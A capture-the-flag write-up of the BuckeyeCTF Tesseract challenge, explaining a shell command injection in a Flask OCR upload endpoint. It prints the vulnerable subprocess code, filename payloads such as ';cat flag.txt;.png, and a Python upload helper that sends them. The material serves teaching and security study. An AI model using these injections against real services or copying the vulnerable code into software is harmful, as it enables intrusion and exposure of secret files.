BuckeyeCTF Tesseract Walkthrough (OCR-as-a-Service)
This is a write-up of the Tesseract (OCR-as-a-service) challenge from BuckeyeCTF this past weekend (Oct 23-24). Thank you to the organizers for this event; it was a fun challenge.
This is also a great challenge to read through for understanding basic command injection vulnerabilities.
Challenge Prompt
Here’s what the CTF prompt looks like (not a ton of detail):
If we go to the webpage at https://tesseract.chall.pwnoh.io/, we see a simple file upload:
There’s nothing interesting in the page source, so I originally thought this was a file upload vulnerability (such as uploading a PHP shell).
Then I realized we were given the app’s source code, so I should check that out. 😅
Source Code
First of all, this program is a Flask (Python) app, and the entire app functionality is in app.py. After the imports and Flask boilerplate, we see that there are two endpoints: one at / and one at /uploads/* for retrieving files.
You can either GET or POST to the / endpoint.
@main.route("/", methods=["GET", "POST"])
def upload_file():
    messages = None
    if request.method == "POST":
        # check if the post request has the file part
        if "file" not in request.files:
            flash("No file part")
            return redirect(request.url)
        file = request.files["file"]
        # If the user does not select a file, the browser submits an
        # empty file without a filename.
        if file.filename == "":
            flash("No selected file")
            return redirect(request.url)
        if file:
            filename = file.filename
            file.save(os.path.join(current_app.config["UPLOAD_FOLDER"], filename))
            # Run OCR on the uploaded image
            process_path = os.path.join("/uploads", filename)
            process = subprocess.run(
                f"tesseract \'{process_path}\' \'{process_path}\' -l eng",
                shell=True,
                check=False,
                capture_output=True,
            )
            print(process.args)
            if process.returncode == 0:
                print("Success")
                return redirect(url_for("main.download_file", name=filename + ".txt"))
            else:
                messages = [process.stdout.decode(), process.stderr.decode()]
    return render_template_string("""HTML stuff goes here, cut for length""",
        messages=messages,
    )
The other endpoint is pretty straightforward, no obvious vulns here:
@main.route("/uploads/<name>")
def download_file(name):
    return send_from_directory(current_app.config["UPLOAD_FOLDER"], name)
Finding the vulnerability
Let’s summarize that first endpoint, since it seems like that’s the location of the vulnerability:
- If it’s a POST request (i.e. if a file is being uploaded to this endpoint), check to see that a file is actually present.
- Next, get the filename.
- Save the file in the upload folder directory.
- Build the path to the saved file (“/uploads/your-file-name-here”).
- Run tesseract, a command-line OCR engine, on that path.
- If it worked, redirect the user to the resulting .txt file under /uploads/.
- If it didn’t work, display the command’s standard output and standard error on the page.
One of the cardinal rules is to not trust user input. Another rule is not to give the user debugging output in the form of error messages and the like.
And both rules are being broken here.
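For contrast, here is a minimal sketch of what honoring the first rule could look like: passing the arguments as a list, so no shell ever parses the filename. This is not the challenge's code. `run_without_shell` is a hypothetical helper, and a child Python process that prints its arguments stands in for tesseract so the sketch runs without it installed.

```python
import subprocess
import sys


def run_without_shell(filename):
    """Hypothetical helper: pass the upload path as a plain argv entry, no shell."""
    process_path = "/uploads/" + filename
    # Stand-in for the tesseract binary (an assumption of this sketch): a child
    # Python process that prints each argument it received on its own line.
    stand_in = [sys.executable, "-c", "import sys; print(*sys.argv[1:], sep=chr(10))"]
    process = subprocess.run(
        stand_in + [process_path, process_path, "-l", "eng"],
        check=False,
        capture_output=True,
        text=True,
    )
    return process.stdout.splitlines()


# Quotes and semicolons arrive as literal characters inside a single argument.
print(run_without_shell("';ls;.png"))
```

In the real app the list would start with "tesseract" instead of the stand-in. The filename would still need sanitizing before it is used as a save path (Werkzeug's secure_filename is one option), since avoiding the shell does nothing about tricks like ../ in the name.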
Problem #1: Trusting user input
Let’s look closer at the tesseract command:
process = subprocess.run(
    f"tesseract \'{process_path}\' \'{process_path}\' -l eng",
    shell=True,
    check=False,
    capture_output=True,
)
This call runs tesseract through the shell (note the shell=True). I searched for Python examples to see which argument was the source file and which one was the destination, thinking I could use command injection to write the contents of flag.txt into my output file.
Turns out I was making it more complicated than it needed to be.
Since the filename ends up inside a shell command line, we can probably cut off the tesseract command partway through and inject our own command.
Python will take our filename and put it between the single quotes, so (leaving out the /uploads/ prefix that os.path.join adds) the shell sees something like:
tesseract 'ourfilename' 'ourfilename' -l eng
If we inject something like ;ls, we’ll get:
tesseract ';ls' ';ls' -l eng
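If we take a JPG or PNG file and rename it ;ls, the OCR works and we get forwarded to the /uploads/%3Bls.txt endpoint, which isn’t what we want. The ; is still inside the single quotes, so the shell treats it as part of the filename rather than as a command separator.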
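To check this offline, the command string can be rebuilt and split the way a POSIX shell would split it. The sketch below is only an approximation: `build_command` is a hypothetical helper that mirrors the f-string from app.py, and `shlex.split` from the standard library stands in for the shell's quoting rules.

```python
import os
import shlex


def build_command(filename):
    """Hypothetical helper mirroring how app.py assembles the shell command."""
    process_path = os.path.join("/uploads", filename)
    return f"tesseract '{process_path}' '{process_path}' -l eng"


command = build_command(";ls")
print(command)
# tesseract '/uploads/;ls' '/uploads/;ls' -l eng

# shlex.split applies POSIX quoting rules, so the quoted ; stays inside the argument.
print(shlex.split(command))
# ['tesseract', '/uploads/;ls', '/uploads/;ls', '-l', 'eng']
```

The semicolon never appears as its own token, so tesseract simply receives an oddly named file.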
Much like SQL injection, we need to close the opening single quote first so that our payload lands outside the quoted string. Let’s try ';ls, giving us a filename of ';ls.png
Now we’re on to something!
We now have two error messages: the tesseract call was incomplete (which we expected), and our second command, the ls, was unsuccessful.
It seems that it’s trying to find ls.txt, rather than using ls as a command by itself. Let’s add another ; after our injected command: ';ls;, making the filename ';ls;.png
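The effect of the extra ; can be sketched by tokenizing the resulting command line. This is an approximation of the shell's behavior, not the shell itself: `build_command` and `shell_tokens` are hypothetical helpers, and the standard library's `shlex` lexer with `punctuation_chars=True` is used so that an unquoted ; comes out as its own token.

```python
import os
import shlex


def build_command(filename):
    """Hypothetical helper mirroring how app.py assembles the shell command."""
    process_path = os.path.join("/uploads", filename)
    return f"tesseract '{process_path}' '{process_path}' -l eng"


def shell_tokens(command):
    """Approximate shell tokenization; unquoted ; becomes a separate token."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


for name in (";ls.png", "';ls;.png"):
    print(repr(name), "->", shell_tokens(build_command(name)))
```

For the second filename, the quote closes right after /uploads/, so tesseract gets a directory as its only argument, ls stands alone between two separators, and the leftover text after the second ; becomes a third, nonsensical command that fails.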
Problem #2: Showing the user debugging output
This output didn’t look any different to me at first. And then I saw the output of the command… it isn’t in the second bullet point, it’s concatenated to the end of the first point:
It looks like our flag is in the same directory, so it should be easy to retrieve it:
__pycache__ app.py flag.txt jail.cfg requirements.txt run.sh sh uploads
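Why the listing shows up on the page at all can be reproduced locally with a harmless stand-in. The sketch below assumes a POSIX system where shell=True runs /bin/sh. `run_like_app` is a hypothetical helper that copies the shape of the app's call and its messages list, with echo substituted for tesseract and echo INJECTED substituted for ls.

```python
import subprocess


def run_like_app(filename):
    """Hypothetical stand-in for the app's OCR step, using echo instead of tesseract."""
    process_path = "/uploads/" + filename
    process = subprocess.run(
        f"echo '{process_path}' '{process_path}' -l eng",
        shell=True,
        check=False,
        capture_output=True,
    )
    if process.returncode == 0:
        return None  # the real app redirects to the .txt file here
    # Same shape as the app: [stdout, stderr] handed to the template.
    return [process.stdout.decode(), process.stderr.decode()]


print(run_like_app("scan.png"))              # command succeeds, nothing is shown
print(run_like_app("';echo INJECTED;.png"))  # injected output lands in stdout
```

The leftover fragment after the second ; is not a real command, so the shell exits with a non-zero status. That sends the app down its error branch, which is exactly the branch that hands the captured stdout, including the injected command's output, to the template.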
Solution
Now that we have a way of doing command injection, can view the debugging output, and know where the flag is, all we need to do is rename our image to ';cat flag.txt;, giving a full filename of ';cat flag.txt;.png
Let’s upload it and get the flag:
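Renaming a file on disk is not strictly required, since the filename is just a field in the multipart request. The following is a rough sketch of sending it directly with the standard library. `build_multipart` and `upload` are hypothetical helpers, the placeholder bytes assume the app never validates the image (the payload makes tesseract fail before it reads any file), and the challenge URL from this write-up may no longer be online.

```python
import urllib.request
import uuid

URL = "https://tesseract.chall.pwnoh.io/"  # from the write-up; may be offline


def build_multipart(filename, data):
    """Build a multipart/form-data body with one part named "file"."""
    boundary = uuid.uuid4().hex
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="file"; filename="{filename}"\r\n'
        "Content-Type: image/png\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return head + data + tail, f"multipart/form-data; boundary={boundary}"


def upload(filename, data=b"placeholder", url=URL):
    """POST the crafted filename and return the response HTML."""
    body, content_type = build_multipart(filename, data)
    request = urllib.request.Request(
        url, data=body, headers={"Content-Type": content_type}, method="POST"
    )
    with urllib.request.urlopen(request) as response:
        return response.read().decode(errors="replace")


# Example call (performs a network request, so it is left commented out):
# print(upload("';cat flag.txt;.png"))
```

The field name "file" comes from request.files["file"] in app.py; everything else about the request is an assumption of this sketch.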
Thanks to the organizers!
References
- Resource on Python command injection: https://book.hacktricks.xyz/misc/basic-python/bypass-python-sandboxes
- CTF command injection problem in JS that gave me the idea to look for an equivalent injection in Python: https://ctftime.org/writeup/20365